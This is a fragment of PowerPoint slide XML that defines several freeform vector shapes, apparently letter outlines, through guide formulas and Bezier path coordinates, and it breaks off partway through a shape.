                <a:gd name="T16" fmla="*/ 72 w 231"/>
                <a:gd name="T17" fmla="*/ 30 h 304"/>
                <a:gd name="T18" fmla="*/ 196 w 231"/>
                <a:gd name="T19" fmla="*/ 30 h 304"/>
                <a:gd name="T20" fmla="*/ 196 w 231"/>
                <a:gd name="T21" fmla="*/ 57 h 304"/>
                <a:gd name="T22" fmla="*/ 213 w 231"/>
                <a:gd name="T23" fmla="*/ 77 h 304"/>
                <a:gd name="T24" fmla="*/ 231 w 231"/>
                <a:gd name="T25" fmla="*/ 57 h 304"/>
                <a:gd name="T26" fmla="*/ 231 w 231"/>
                <a:gd name="T27" fmla="*/ 20 h 304"/>
                <a:gd name="T28" fmla="*/ 211 w 231"/>
                <a:gd name="T29" fmla="*/ 0 h 304"/>
                <a:gd name="T30" fmla="*/ 21 w 231"/>
                <a:gd name="T31" fmla="*/ 0 h 304"/>
                <a:gd name="T32" fmla="*/ 0 w 231"/>
                <a:gd name="T33" fmla="*/ 15 h 304"/>
                <a:gd name="T34" fmla="*/ 21 w 231"/>
                <a:gd name="T35" fmla="*/ 30 h 304"/>
                <a:gd name="T36" fmla="*/ 37 w 231"/>
                <a:gd name="T37" fmla="*/ 30 h 304"/>
                <a:gd name="T38" fmla="*/ 37 w 231"/>
                <a:gd name="T39" fmla="*/ 274 h 304"/>
                <a:gd name="T40" fmla="*/ 21 w 231"/>
                <a:gd name="T41" fmla="*/ 274 h 304"/>
                <a:gd name="T42" fmla="*/ 0 w 231"/>
                <a:gd name="T43" fmla="*/ 289 h 304"/>
                <a:gd name="T44" fmla="*/ 21 w 231"/>
                <a:gd name="T45" fmla="*/ 304 h 304"/>
                <a:gd name="T46" fmla="*/ 98 w 231"/>
                <a:gd name="T47" fmla="*/ 304 h 304"/>
                <a:gd name="T48" fmla="*/ 117 w 231"/>
                <a:gd name="T49" fmla="*/ 289 h 304"/>
                <a:gd name="T50" fmla="*/ 98 w 231"/>
                <a:gd name="T51" fmla="*/ 274 h 304"/>
                <a:gd name="T52" fmla="*/ 72 w 231"/>
                <a:gd name="T53" fmla="*/ 274 h 304"/>
                <a:gd name="T54" fmla="*/ 72 w 231"/>
                <a:gd name="T55" fmla="*/ 16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1" h="304">
                  <a:moveTo>
                    <a:pt x="72" y="167"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="139" y="167"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="188"/>
                    <a:pt x="139" y="196"/>
                    <a:pt x="157" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="196"/>
                    <a:pt x="174" y="185"/>
                    <a:pt x="174" y="175"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="119"/>
                    <a:pt x="174" y="108"/>
                    <a:pt x="157" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="108"/>
                    <a:pt x="139" y="116"/>
                    <a:pt x="139" y="137"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="57"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="66"/>
                    <a:pt x="196" y="77"/>
                    <a:pt x="213" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="77"/>
                    <a:pt x="231" y="67"/>
                    <a:pt x="231" y="57"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="5"/>
                    <a:pt x="228" y="0"/>
                    <a:pt x="211" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="21" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="37" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="21" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="304"/>
                    <a:pt x="117" y="304"/>
                    <a:pt x="117" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="274"/>
                    <a:pt x="105" y="274"/>
                    <a:pt x="98" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="16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72" name="Freeform 913">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF4F45C7-B5E9-479E-8272-F1FE1753761B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId89"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5967413" y="2109788"/>
              <a:ext cx="84138" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215 w 243"/>
                <a:gd name="T1" fmla="*/ 30 h 308"/>
                <a:gd name="T2" fmla="*/ 243 w 243"/>
                <a:gd name="T3" fmla="*/ 15 h 308"/>
                <a:gd name="T4" fmla="*/ 223 w 243"/>
                <a:gd name="T5" fmla="*/ 0 h 308"/>
                <a:gd name="T6" fmla="*/ 172 w 243"/>
                <a:gd name="T7" fmla="*/ 0 h 308"/>
                <a:gd name="T8" fmla="*/ 151 w 243"/>
                <a:gd name="T9" fmla="*/ 15 h 308"/>
                <a:gd name="T10" fmla="*/ 179 w 243"/>
                <a:gd name="T11" fmla="*/ 30 h 308"/>
                <a:gd name="T12" fmla="*/ 141 w 243"/>
                <a:gd name="T13" fmla="*/ 183 h 308"/>
                <a:gd name="T14" fmla="*/ 121 w 243"/>
                <a:gd name="T15" fmla="*/ 269 h 308"/>
                <a:gd name="T16" fmla="*/ 121 w 243"/>
                <a:gd name="T17" fmla="*/ 269 h 308"/>
                <a:gd name="T18" fmla="*/ 112 w 243"/>
                <a:gd name="T19" fmla="*/ 224 h 308"/>
                <a:gd name="T20" fmla="*/ 64 w 243"/>
                <a:gd name="T21" fmla="*/ 30 h 308"/>
                <a:gd name="T22" fmla="*/ 92 w 243"/>
                <a:gd name="T23" fmla="*/ 15 h 308"/>
                <a:gd name="T24" fmla="*/ 71 w 243"/>
                <a:gd name="T25" fmla="*/ 0 h 308"/>
                <a:gd name="T26" fmla="*/ 20 w 243"/>
                <a:gd name="T27" fmla="*/ 0 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 243"/>
                <a:gd name="T29" fmla="*/ 15 h 308"/>
                <a:gd name="T30" fmla="*/ 28 w 243"/>
                <a:gd name="T31" fmla="*/ 30 h 308"/>
                <a:gd name="T32" fmla="*/ 94 w 243"/>
                <a:gd name="T33" fmla="*/ 289 h 308"/>
                <a:gd name="T34" fmla="*/ 121 w 243"/>
                <a:gd name="T35" fmla="*/ 308 h 308"/>
                <a:gd name="T36" fmla="*/ 149 w 243"/>
                <a:gd name="T37" fmla="*/ 290 h 308"/>
                <a:gd name="T38" fmla="*/ 215 w 243"/>
                <a:gd name="T39" fmla="*/ 3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3" h="308">
                  <a:moveTo>
                    <a:pt x="215" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="30"/>
                    <a:pt x="243" y="30"/>
                    <a:pt x="243" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="0"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="223" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="0"/>
                    <a:pt x="151" y="0"/>
                    <a:pt x="151" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="30"/>
                    <a:pt x="162" y="30"/>
                    <a:pt x="179" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141" y="183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="209"/>
                    <a:pt x="125" y="247"/>
                    <a:pt x="121" y="269"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="121" y="269"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="251"/>
                    <a:pt x="116" y="243"/>
                    <a:pt x="112" y="224"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="30"/>
                    <a:pt x="92" y="30"/>
                    <a:pt x="92" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="0"/>
                    <a:pt x="79" y="0"/>
                    <a:pt x="71" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="10" y="30"/>
                    <a:pt x="28" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="289"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="308"/>
                    <a:pt x="107" y="308"/>
                    <a:pt x="121" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="308"/>
                    <a:pt x="144" y="308"/>
                    <a:pt x="149" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="215"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73" name="Freeform 914">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76AE40CD-7201-4EFF-8F59-85F9B3D4A7F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId90"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6059488" y="2138363"/>
              <a:ext cx="82550" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 239"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 239"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 239"/>
                <a:gd name="T5" fmla="*/ 32 h 335"/>
                <a:gd name="T6" fmla="*/ 149 w 239"/>
                <a:gd name="T7" fmla="*/ 82 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 239"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 239"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 239"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 239"/>
                <a:gd name="T15" fmla="*/ 82 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 239"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 239"/>
                <a:gd name="T19" fmla="*/ 30 h 335"/>
                <a:gd name="T20" fmla="*/ 219 w 239"/>
                <a:gd name="T21" fmla="*/ 47 h 335"/>
                <a:gd name="T22" fmla="*/ 239 w 239"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 239"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 239"/>
                <a:gd name="T27" fmla="*/ 18 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 239"/>
                <a:gd name="T29" fmla="*/ 3 h 335"/>
                <a:gd name="T30" fmla="*/ 19 w 239"/>
                <a:gd name="T31" fmla="*/ 82 h 335"/>
                <a:gd name="T32" fmla="*/ 35 w 239"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 25 w 239"/>
                <a:gd name="T35" fmla="*/ 164 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 239"/>
                <a:gd name="T37" fmla="*/ 200 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 239"/>
                <a:gd name="T39" fmla="*/ 261 h 335"/>
                <a:gd name="T40" fmla="*/ 116 w 239"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 232 w 239"/>
                <a:gd name="T43" fmla="*/ 261 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 239"/>
                <a:gd name="T45" fmla="*/ 204 h 335"/>
                <a:gd name="T46" fmla="*/ 125 w 239"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 239"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 76 w 239"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 239"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 239"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 239"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 116 w 239"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 239"/>
                <a:gd name="T61" fmla="*/ 261 h 335"/>
                <a:gd name="T62" fmla="*/ 49 w 239"/>
                <a:gd name="T63" fmla="*/ 226 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 239"/>
                <a:gd name="T65" fmla="*/ 218 h 335"/>
                <a:gd name="T66" fmla="*/ 203 w 239"/>
                <a:gd name="T67" fmla="*/ 261 h 335"/>
                <a:gd name="T68" fmla="*/ 116 w 239"/>
                <a:gd name="T69" fmla="*/ 30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 h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="102" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="32"/>
                    <a:pt x="149" y="56"/>
                    <a:pt x="149" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="111"/>
                    <a:pt x="127" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="151"/>
                    <a:pt x="77" y="163"/>
                    <a:pt x="102" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="163"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="179" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="33"/>
                    <a:pt x="193" y="31"/>
                    <a:pt x="200" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="214" y="47"/>
                    <a:pt x="219" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="239" y="41"/>
                    <a:pt x="239" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="16"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="0"/>
                    <a:pt x="173" y="1"/>
                    <a:pt x="150" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="124" y="3"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="19" y="40"/>
                    <a:pt x="19" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="35" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="25" y="149"/>
                    <a:pt x="25" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="181"/>
                    <a:pt x="32" y="194"/>
                    <a:pt x="37" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="52" y="335"/>
                    <a:pt x="116" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="232" y="304"/>
                    <a:pt x="232" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="243"/>
                    <a:pt x="223" y="218"/>
                    <a:pt x="198" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="201"/>
                    <a:pt x="170" y="190"/>
                    <a:pt x="125" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="80" y="190"/>
                    <a:pt x="76" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="33" y="236"/>
                    <a:pt x="49" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="218"/>
                    <a:pt x="66" y="218"/>
                    <a:pt x="103" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="218"/>
                    <a:pt x="203" y="218"/>
                    <a:pt x="203" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="116" y="30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74" name="Freeform 915">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71272A2-4E22-455E-9F84-A1947B32F904}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId91"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6149976" y="2119313"/>
              <a:ext cx="73025" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 62 h 279"/>
                <a:gd name="T8" fmla="*/ 99 w 212"/>
                <a:gd name="T9" fmla="*/ 62 h 279"/>
                <a:gd name="T10" fmla="*/ 99 w 212"/>
                <a:gd name="T11" fmla="*/ 21 h 279"/>
                <a:gd name="T12" fmla="*/ 82 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 21 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 62 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 62 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 214 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 212"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 214 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 99 w 212"/>
                <a:gd name="T39" fmla="*/ 211 h 279"/>
                <a:gd name="T40" fmla="*/ 99 w 212"/>
                <a:gd name="T41" fmla="*/ 92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79">
                  <a:moveTo>
                    <a:pt x="99" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="62"/>
                    <a:pt x="188" y="62"/>
                    <a:pt x="180" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="11"/>
                    <a:pt x="99" y="0"/>
                    <a:pt x="82" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="64" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="62"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="205"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="249"/>
                    <a:pt x="99" y="223"/>
                    <a:pt x="99" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99"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75" name="Freeform 916">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35F513D3-6666-449E-BCC8-141D222FBB4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId92"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6238876" y="2109788"/>
              <a:ext cx="79375" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 20 w 232"/>
                <a:gd name="T1" fmla="*/ 0 h 304"/>
                <a:gd name="T2" fmla="*/ 0 w 232"/>
                <a:gd name="T3" fmla="*/ 15 h 304"/>
                <a:gd name="T4" fmla="*/ 20 w 232"/>
                <a:gd name="T5" fmla="*/ 30 h 304"/>
                <a:gd name="T6" fmla="*/ 31 w 232"/>
                <a:gd name="T7" fmla="*/ 30 h 304"/>
                <a:gd name="T8" fmla="*/ 31 w 232"/>
                <a:gd name="T9" fmla="*/ 274 h 304"/>
                <a:gd name="T10" fmla="*/ 20 w 232"/>
                <a:gd name="T11" fmla="*/ 274 h 304"/>
                <a:gd name="T12" fmla="*/ 0 w 232"/>
                <a:gd name="T13" fmla="*/ 289 h 304"/>
                <a:gd name="T14" fmla="*/ 20 w 232"/>
                <a:gd name="T15" fmla="*/ 304 h 304"/>
                <a:gd name="T16" fmla="*/ 123 w 232"/>
                <a:gd name="T17" fmla="*/ 304 h 304"/>
                <a:gd name="T18" fmla="*/ 232 w 232"/>
                <a:gd name="T19" fmla="*/ 154 h 304"/>
                <a:gd name="T20" fmla="*/ 123 w 232"/>
                <a:gd name="T21" fmla="*/ 0 h 304"/>
                <a:gd name="T22" fmla="*/ 20 w 232"/>
                <a:gd name="T23" fmla="*/ 0 h 304"/>
                <a:gd name="T24" fmla="*/ 66 w 232"/>
                <a:gd name="T25" fmla="*/ 274 h 304"/>
                <a:gd name="T26" fmla="*/ 66 w 232"/>
                <a:gd name="T27" fmla="*/ 30 h 304"/>
                <a:gd name="T28" fmla="*/ 114 w 232"/>
                <a:gd name="T29" fmla="*/ 30 h 304"/>
                <a:gd name="T30" fmla="*/ 198 w 232"/>
                <a:gd name="T31" fmla="*/ 154 h 304"/>
                <a:gd name="T32" fmla="*/ 114 w 232"/>
                <a:gd name="T33" fmla="*/ 274 h 304"/>
                <a:gd name="T34" fmla="*/ 66 w 232"/>
                <a:gd name="T35" fmla="*/ 27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2" h="304">
                  <a:moveTo>
                    <a:pt x="20" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
